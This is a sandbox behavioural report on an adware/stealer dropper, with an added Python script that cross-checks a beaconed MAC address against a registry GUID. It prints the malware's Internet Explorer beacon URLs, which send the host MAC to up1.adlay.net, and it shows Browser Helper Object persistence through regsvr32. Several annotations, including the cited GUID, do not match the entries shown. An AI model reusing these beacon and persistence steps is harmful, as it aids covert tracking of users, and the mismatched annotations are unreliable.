PID 2484 wrote to memory of 1664 N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2968 wrote to memory of 840 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=52-c7-b7-c5-b0-73&key=kmj&pid=rain

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe /s psjm.dll

(The command line names system32, but the image that ran is the SysWOW64 copy: the dropper is 32-bit, so its path is subject to WoW64 file system redirection. /s suppresses the DllRegisterServer result dialog, and the bare file name resolved to the psjm.dll the dropper wrote to SysWOW64, as the InprocServer32 value recorded under "Modifies registry class" confirms.)

C:\WINDOWS\SysWOW64\4875\Winupdate.exe

Winupdate.exe

C:\WINDOWS\SysWOW64\4875\Winspss.exe

Winspss.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=52-c7-b7-c5-b0-73&key=kmj

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2968 CREDAT:603142 /prefetch:2

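Both Internet Explorer command lines carry the sandbox host's MAC address (mac=52-c7-b7-c5-b0-73), and the same 48 bits appear as the node field of the GUID Internet Explorer wrote under Recovery\AdminActive ({0D79C1B1-E7A7-11EE-9F01-52C7B7C5B073}), which is a version-1, time-based UUID. The Python below is an added example written for this report, not sandbox output; it parses the beacon URLs and decodes the GUID with the standard library only, so the MAC and the GUID's embedded timestamp can be cross-checked offline. The URLs and GUID are copied from the rows above; nothing else is assumed.

```python
"""Cross-check the mac= parameter in the sample's beacon URLs against the
node field and timestamp of the v1 UUID Internet Explorer wrote to the
registry.  Added example for this report, not sandbox output."""
import uuid
from datetime import datetime, timedelta, timezone
from urllib.parse import urlparse, parse_qs

BEACON_URLS = [
    "http://up1.adlay.net/App/Pro/rialtom_cnt.php?mac=52-c7-b7-c5-b0-73&key=kmj&pid=rain",
    "http://up1.adlay.net/App/Pro/rialtom_pro.php?mac=52-c7-b7-c5-b0-73&key=kmj",
]
RECOVERY_GUID = "{0D79C1B1-E7A7-11EE-9F01-52C7B7C5B073}"
GREGORIAN_EPOCH = datetime(1582, 10, 15, tzinfo=timezone.utc)  # UUID v1 time origin


def beacon_fields(url):
    """Split a beacon URL into (host, path, {param: value})."""
    u = urlparse(url)
    params = {k: v[0] for k, v in parse_qs(u.query).items()}
    return u.netloc, u.path, params


def mac_from_url(url):
    """Normalise the mac= parameter to aa:bb:cc:dd:ee:ff."""
    return beacon_fields(url)[2]["mac"].replace("-", ":").lower()


def mac_from_guid(guid):
    """Node field (last 48 bits) of a v1 UUID, formatted like a MAC address."""
    u = uuid.UUID(guid)
    if u.version != 1:
        raise ValueError(f"{guid} is not a time-based (v1) UUID")
    return ":".join(f"{(u.node >> shift) & 0xFF:02x}" for shift in range(40, -1, -8))


def guid_timestamp(guid):
    """Creation time encoded in a v1 UUID: 100 ns ticks since 1582-10-15 UTC."""
    u = uuid.UUID(guid)
    return GREGORIAN_EPOCH + timedelta(microseconds=u.time // 10)


def locally_administered(mac):
    """True when the 0x02 bit of the first octet is set (not a vendor-assigned OUI)."""
    return bool(int(mac.split(":")[0], 16) & 0x02)


def same_host(url, guid):
    """Does the beacon report the MAC that the registry GUID embeds?"""
    return mac_from_url(url) == mac_from_guid(guid)


if __name__ == "__main__":
    for url in BEACON_URLS:
        print(beacon_fields(url), mac_from_url(url), same_host(url, RECOVERY_GUID))
    print(mac_from_guid(RECOVERY_GUID), guid_timestamp(RECOVERY_GUID).isoformat())
```

For this sample the two sources agree, the GUID's timestamp decodes to the detonation date (2024-03-21), and the 0x02 bit of the first octet marks the address as locally administered, which is what a virtual NIC normally carries. On a real incident the same check ties a beacon seen in proxy logs back to a specific host without relying on the adware's pid=/key= values, which here are static strings (kmj, rain) rather than per-host identifiers.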
Network

Country Destination Domain Proto
US 8.8.8.8:53 up1.adlay.net udp
US 8.8.8.8:53 up1.adlay.net udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Only DNS lookups for up1.adlay.net were recorded; no TCP connection to that host appears within the 135 s network window, so the server's response to the mac=/key=/pid= beacons was not captured. The 443 connections to ieonline.microsoft.com are Internet Explorer's own traffic.

Files

C:\Windows\SysWOW64\psjm.dll

MD5 8cea2d23c693ea6fa8e41ea6d9cc3432
SHA1 e965e000871a0b8e6b206256ddcf7657b13cc931
SHA256 7f486807cae14b4913ed33d7e3fe468d7fb97a4e8ae7b7e281a8226d6f5047a1
SHA512 63ff64ca8736b23f6b23466ddd35efb26dd0fdf1675926ef2c74e608384748b7f445c8711105b52dbfc859bdf67fe0e790f5d0365e0b6bcbb1ed90600b45ae99

\Windows\SysWOW64\4875\Winupdate.exe

MD5 addc0dd99f694a8df3caac3fa7c3fda3
SHA1 44d3310c26fba0bab0c679966ca7e26f7333dbc7
SHA256 54203137d5f8dab7b9d47af23d46afd7f8f7a20205d734f30c622167f4a9ac8f
SHA512 8fba70f876e5dd420532335d960dcb9c1af2d056c771410b778b43ca7db898d70f406ef8f1866f8308e95bb63f9cbd4b4f4ebd2a89fa93dd9bb79948f0bd5451

C:\Users\Admin\AppData\Local\Temp\CabC949.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 753df6889fd7410a2e9fe333da83a429
SHA1 3c425f16e8267186061dd48ac1c77c122962456e
SHA256 b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78
SHA512 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

C:\Users\Admin\AppData\Local\Temp\TarCB64.tmp

MD5 dd73cead4b93366cf3465c8cd32e2796
SHA1 74546226dfe9ceb8184651e920d1dbfb432b314e
SHA256 a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22
SHA512 ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8df00f33e4c169844aa4b57e3354b3dc
SHA1 c08cca631cbee8f25db2f6652ceaa454f2e0c644
SHA256 c533b5e3b544ff6f948fa773c81b34bd3d5b75ecad28712c33830d3d426e2eaa
SHA512 b7700c8f6a4650adbff4f4b819f624c91b024f8ccb663125f38a2b209827ced3a9db97d9a5cd83f12ecec0e9d7723601f4b247a3addb5c65ddd2b38657d25062

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 affc4a2b17a2a95c19c7dc7d09158a65
SHA1 7bd639b169127e0a77aae6f7a3bd5839211a805a
SHA256 61a650ba31a77fb73e3ab303c17fe99441b2a0d52a4e05effac4ce8643db5e58
SHA512 53f03a291ab07d5bbf31fad9217a9c9b8a8384f9ca5ec8a63ec728a8885bea764364fb869d15f0ddb75677c5a9eabf31c3ec4be93c429a0753876e325b5cd4b6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f1da51153bacc38dc1fe1709f8b4b0a9
SHA1 b3484f2c328b8a9ec1b4a83fc8d72969693ba279
SHA256 704fb55a8a884d97992602862286b0511b6dd83830461ee4daa4bddacf4ffcc5
SHA512 806b5c0ac61bcd4bd989a9e25b0c244545a0bb709c78923d47e4afac6159c9575fe1cc8ffbda027ad3daee56e9320f0a108f8e0a9fec2c7af19cadd4fbbd1eb0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56158f3b2d7294a0f3be86391cc64cb1
SHA1 216c8f660500bbf6ff38cccf905b52e403c9dd47
SHA256 3e50f1f7f6d26722bcea53324d78c6a36d02a1a6ab17604d31197761fa304c0b
SHA512 c4f1e21133a2bdc59bbac6a0c521a6a9102ad5abbca6a2e0499e1ec125092f281d9d634b9fda7a0b6b5a2c4a60a5ea1720c98cdf1c76a2aa5fc708bd15f67e84

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 749d7a32da84a13be906d553f2466375
SHA1 18cfb7aeebac2df675f682f9fb358d83683a5bb6
SHA256 72ce61e6943586691577f25b5766048ba6df3d42f45213bc4a0b1a29944a5a7c
SHA512 1db5d328ea5076cda90fcd321f6c12be757aff048ae99ae1fd2268f5b66d31b097a4d80f728f82a9a27418c4c9e2ef9dbf50d9f18d448d643fb899a35d10f489

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6e0175d98f0b8083f4dead5c9b44844b
SHA1 fb3b8f6f7ce17db0d8771caa01d5dcb3ed2b46e0
SHA256 93c5abc98d76daa51aca6b7520f77b8fb821aed5744b6a67df2f804ef6fa49cf
SHA512 e70fefcc8d65978e9264b7be74fee6e8fe652a604d5db17fe34a129127c372a97f47e27479aae514566a0393c1b5c16160333d113d9cf527bebdf4b6b38b7933

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f66c445693656d2cd4a5130fa552a759
SHA1 7654eebab0f31546f1f1b8d027936574dc546c0a
SHA256 829ec9059a0a99bd289742b12cd5ed656e05299744ecba56c55d1d38d9633984
SHA512 474a7b3fed8754710b54f00cc6c24c50b12cb3ada8ce7269ea710d87fc3ecb283717675ed1ad2985d440dc065a4b448fc35e764a5409e37e560d0483de09d680

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 e6ee25fb2f07aa6503b659d9962ed721
SHA1 b35bc835425192974b0867cca27accd56787e8c7
SHA256 c60d9b98d407c2d633a1f5489333452a34cda8f306b67cc3edc59eb6889704c1
SHA512 7abcaff9a29d0ca87aa3aaac35b2d32993e9a497f561df16d03530f0448d2bc76f5323aca4109ec8f66ae0689beddc7bb17999ca09488ec17910c0a3cc3e08c3

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 64e9d184b730f43e56686d635d3a5d56
SHA1 e797fe62bf7bbb338682c64c5c076813bbb02918
SHA256 a94a5f035ce253f4a27fc85ecd1d35eb3319fbcafc1407cbd6fbc81c258ab671
SHA512 764ac022d03017222577d126be7bff53f8b18af868cbc19863da47c681617d5a2935e27efa2726089e237bd2fb434d8d484eac44ffa481ad8a16ace910271e61

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 347d53118157913966fca607a689d494
SHA1 8676a5de2dbfb910cde99af860255dff024077a8
SHA256 f031bb3e024399117c029f670a01ca2c893957d426568f14afd5101d166b0fcf
SHA512 e4f98aec823e84de049222a50a5a686a7b9013c95c734bb0f11da755aeb864bef87a4eff28a8eeb58877e15a23cbf39e9115f67a1fd899123139c5ffa6ae5386

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2057d319aaea8dffdd6538f65f046213
SHA1 2f3347f969acc40329146f6eb65d9f7f1dfd0f1f
SHA256 d6ac44486a630b434cc2c983a9bfc1405b286258acdeb685dcb630f18bc2856b
SHA512 d34c839a4f25e2f8af5c88eb083ebdda93b33c6fa5ad03bb35709aaddb51ea0a83bfb1cfe22e7b7d6260181f4027f4e08a5f04c7f8e1a6ceee1b68e98198c10f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 396075906327654fe2a3473eaedcd27b
SHA1 37ef3b084ce4af7b98f8b469ae43f458458a7e92
SHA256 9e0a197f9536a31c0093b5f8788d079adec742fdd04cace3c85d9d9a53b3464e
SHA512 11b56adddcb2bc25fcfe1d2d9c028e4494d3666ac89db308ead3c38311a04e87c196c4cfe60a434121f6d84e31d28477f1a51da6254c16154edfd6b02cab2542

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-21 17:18

Reported

2024-03-21 17:21

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\WINDOWS\SysWOW64\4875\Winupdate.exe N/A
N/A N/A C:\WINDOWS\SysWOW64\4875\Winspss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FF71FF86-04AC-4cb2-A35A-1262BF791A01} C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\WINDOWS\SysWOW64\4875\Winspss.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker_Charm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\PowerHacker.ini C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\Windows\SysWOW64\psjm.dll C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A
File created C:\WINDOWS\SysWOW64\4875\Winupdate.exe C:\Users\Admin\AppData\Local\Temp\dc2f1aa97d98d83b66f0d5253bb41165.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{0C597D78-E7A7-11EE-87B8-628714877227} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000055176c4ced34542856d0f29947515a500000000020000000000106600000001000020000000eae00ac8c3dc764d8f86ebc1420027cdef75a392656c00240d8289e6b9b1e787000000000e800000000200002000000003cda4bcebcb9995683ee803b914a1be874d4ea2f0d35f7feb2a91c91ac752292000000084278da60d67cbf27faf0145e9d9f99678934ba283e2d2893ac5f829d5e2609940000000198e5a7b9d8f297da5cabe2b803d8e7c5734214dd890e2e878dcebd31e4edfffad1e46f3c4a5e7848ba80edb7c84bfc0fb5fd9d5a55067c5f7b5333f8865f603 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3821346590" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3821346590" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417806489" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3780721503" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3780721503" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31095731" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 402281cfb37bda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3821033987" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3821033987" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3e0000003e000000c4040000a3020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31095731" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\ = "nop1 Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\TypeLib\ = "{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ProgID\ = "new.myb.1" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3DCE6BAA-C252-4ED2-A758-E2FEAD9A1BCC}\ProxyStubClsid32 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\ = "noep Class" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FF71FF86-04AC-4cb2-A35A-1262BF791A01}\VersionIndependentProgID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5399FC70-D920-4D82-8FDE-CC3AD2DE6B76}\1.0\HELPDIR\ = "C:\\Windows\\System32" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Nnew.myob.1\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
